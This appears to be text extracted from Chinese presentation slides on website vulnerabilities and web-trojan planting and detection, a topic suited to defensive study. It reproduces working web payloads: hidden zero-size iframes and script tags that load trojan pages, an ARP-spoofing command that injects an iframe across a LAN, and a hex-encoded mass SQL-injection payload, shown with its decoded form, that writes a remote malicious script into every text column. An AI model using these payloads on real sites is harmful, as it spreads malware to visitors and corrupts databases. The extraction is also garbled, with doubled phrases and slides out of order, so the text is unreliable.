网站漏洞与挂马检测

http://www.antian365.com
（4）网络钓鱼挂马 ）
网络中最常见的欺骗手段，黑客们利用人们的猎奇、 网络中最常见的欺骗手段，黑客们利用人们的猎奇、 贪心等心理伪装构造一个链接或者一个网页， 贪心等心理伪装构造一个链接或者一个网页，利用社会工 程学欺骗方法，引诱点击， 程学欺骗方法，引诱点击，当用户打开一个看似正常的页 面时，网页代码随之运行，隐蔽性极高。这种方式往往和 面时，网页代码随之运行，隐蔽性极高。 欺骗用户输入某些个人隐私信息， 欺骗用户输入某些个人隐私信息，然后窃取个人隐私相关 比如攻击者模仿腾讯公司设计了一个获取QQ币的页 联。比如攻击者模仿腾讯公司设计了一个获取 币的页 引诱输入QQ号和密码 。 面，引诱输入 号和密码
http://www.antian365.com
（3）图片伪装挂马 ）
随着防毒技术的发展，黑手段也不停地更新，图片木马技术 逃避杀毒监视的新技术，攻击者将类似： http://www.xxx.com/test.htm中的木马代码植入到test.jpg图片文件 中，这些嵌入代码的图片都可以用工具生成，攻击者只需输入相 关的选项就可以了。图片木马生成后，再利用代码调用执行，是 比较新颖的一种挂马隐蔽方法，实例代码如：
<p><a id="qipian" href="http://www.hacker.com.cn"></a></p> <div> <a href="http://safe.it168.com" target="_blank"> <table> <caption> <label for="qipian"> <u style="cursor;pointer;color;blue"> </u> </label> </caption> </table> </a> </div>
http://www.antian365.com
2、一些案例 、
政府门户网站：中国政府采购招标网等 中国政府采购招标网等2966家网站被 中国政府采购招标网等 家网站被 挂马” “挂马” http://sec.chinabyte.com/209/8973709.shtml 企业门户网站（航天人才市场/中国京剧门户网站/经 济贸易等） 个人电脑：微软视频控件漏洞致木马爆发 460万电脑 被攻击 （http://it.sohu.com/20090709/n265092199.shtml）
http://www.antian365.com
（7）Arp挂马 ） 挂马
网页挂马最难的就是传播了，小网站易入侵但是 访问人数不多，收获的肉鸡也就不是很多。因此，一 种新的挂马方式开始流行——局域网ARP欺骗挂马， 只要局域网内一台机子中招了，它就可以在内网传播 含有木马的网页，捕获的肉鸡就会成几何增长。 zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 port 80 -insert "＜iframe src='http://192.168.0.2/hackll.htm' width=0 height=0 ＞
4、常见的挂马代码 、
Js调用型网页挂马 框架嵌入式网络挂马 图片伪装挂马 网络钓鱼挂马 利用程序漏洞伪装挂马 IIS高级挂马 Arp挂马 数据库挂马 Txt文件挂马 其它挂马方法
http://www.antian365.com
（1）Js调用型网页挂马 ） 调用型网页挂马
js挂马是一种利用js脚本文件调用的原理进行 的网页木马隐蔽挂马技术，如：黑客先制作一 个.js文件，然后利用js代码调用到挂马的网页。通 常代码如下：
<html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html>
当用户打开http://www.xxx.com/test.htm时，显示给用户的是 http://www.xxx.com/test.jpg，而http://www.xxx.com/test.htm网页代 码也随之运行。
（一）安全框架和体系
1、安全体系架构 、
http://www.antian365.com
（一）安全框架和体系
2、系统安全体系策略 、
http://www.antian365.com
（一）安全框架和体系（续）
3、系统的安全生命周期 、
http://www.antian365.com
（二）网站漏洞
http://www.antian365.com
（2）框架嵌入式网络挂马 ）
网页木马被攻击者利用iframe语句，加载到 任意网页中都可执行的挂马形式，是最早也是最 有效的的一种网络挂马技术。通常的挂马代码如 下： <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 解释：在打开插入该句代码的网页后，就也就 打开了http://www.xxx.com/muma.html页面，但 是由于它的长和宽都为“0”，所以很难察觉，非 常具有隐蔽性。
网站漏洞与挂马检测
陈小兵 Site: www.antian365.com Blog：simeon.blog.51cto.com
http://www.antian365.com
交流内容
安全框架和体系 网站漏洞 网站挂马 挂马检测 安全防范措施 挂马反击 挂马应急响应方案
http://www.antian365.com
http://www.antian365.com
3、管理安全 、
网站调整 需求调整 功能调整 导致一些安全隐患或者漏洞 生成大量的bak 网站rar文件 源代码泄漏 程序漏洞
http://www.antian365.com
4、管理设置 、
IIS权限设置 系统的安全设置 Ftp安全设置 数据库安全设置 防火墙设置 防病毒监控 IDS部署 口令安全
http://www.antian365.com
3、挂马本质与危害 、
挂马本质 追求利益：盗取游戏帐号、流量商人 由黑客主导逐渐演变为网站站长也参与 挂马危害 伤害网站（访问者）顾客 影响网站的声誉 资料丢失引起商业损失 网站系统受到破坏 病毒传播，消耗网络带宽，破坏网络
http://www.antian365.com
http://www.antian365.com
伪装的QQ页面 页面 伪装的
http://www.antian365.com
（5）伪装挂马 ）
高级欺骗，黑客利用IE或者Fixfox浏览器的设计缺陷制 造的一种高级欺骗技术，当用户访问木马页面时地址栏显示 www.sina.com或者security.ctocio.com.cn等用户信任地址， 其实却打开了被挂马的页面，从而实现欺骗，示例代码如：
http://www.antian365.com
（6）IIS高级挂马 ） 高级挂马
在IIS本身的一些文件中插入挂马代码。一 台服务器几乎所有网站打开网页，甚至HTML 网页都出现了网页木马。 C:\Inetpub\wwwroot\iisstart.htm %windir%\system32\inetsrv\MetaBase.xml
http://www.antian365.com
（8）数据库挂马 ）
xxx.asp id=90;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C4043205641524348415228323535292 04445434C415245205461626C655F437572736F7220435552534F5220464F522053 454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656 3747320612C737973636F6C756D6E73206220574845524520612E69643D622E696 420414E4420612E78747970653D27752720414E442028622E78747970653D39392 04F5220622E78747970653D3335204F5220622E78747970653D323331204F522062 2E78747970653D31363729204F50454E205461626C655F437572736F72204645544 348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542 C4043205748494C4528404046455443485F5354415455533D302920424547494E20 455845432827555044415445205B272B40542B275D20534554205B272B40432B27 5D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B 40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E 616477626E722E636F6D2F622E6A733E3C2F7363726970743E2727272920464554 4348204E4558542046524F4D205461626C655F437572736F7220494E544F204054 2C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F 43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC( @S);--
1、程序安全 、 程序员留的后门（亿城影视cms系统挂马）
http://www.antian365.com
1、程序安全（续） 、程序安全（
输入约束不严格 提交参数 开发过程中的安全需求 源代码泄漏 程序代码安全 开发和部署中的弱口令
http://www.antian365.com
2、程序漏洞 、
<script language=javascript src=http://www.xxx.com/gm.js></script>
http://www.xxx.com/gm.js就是一个js脚本文件， 通过它调用和执行木马的服务端。这些js文件一般 都可以通过工具生成，攻击者只需输入相关的选 项就可以了。
http://www.antian365.com
解密后的代码
DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’] set [’+@C+’]= rtrim(convert(varchar,[’+@C+’]))+ ”挂马内容”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
SQL注入漏洞 注入漏洞 专用编辑器Ewebeditor/Fckeditor/CuteEditor漏洞 专用编辑器 漏洞 上传功能导致的漏洞 mdb数据库改用 数据库改用ASP\ASA等名字作为数据库扩展名 数据库改用 等名字作为数据库扩展名 后台显示数据库路径 数据库可备份修改扩展 文件管理部分传递参数过滤问题及外部提交 任意文件下载漏洞 远程包含漏洞 使用未加密的cookies进行用户权限等级及权限验证 使用未加密的 进行用户权限等级及权限验证 session对象欺骗 对象欺骗
http://www.antian365.com
（三）网站挂马
挂马的趋势 一些案例 挂马的本质和危害 常见的挂马来自百度文库码
http://www.antian365.com
1、挂马趋势 、
大型网站成为挂马首选 挂马向自动化靠拢 新漏洞爆发是高发期 漏洞全能型大小通吃，txt，htm，gif，flash， rm，pdf等均可以挂马。 境内外勾结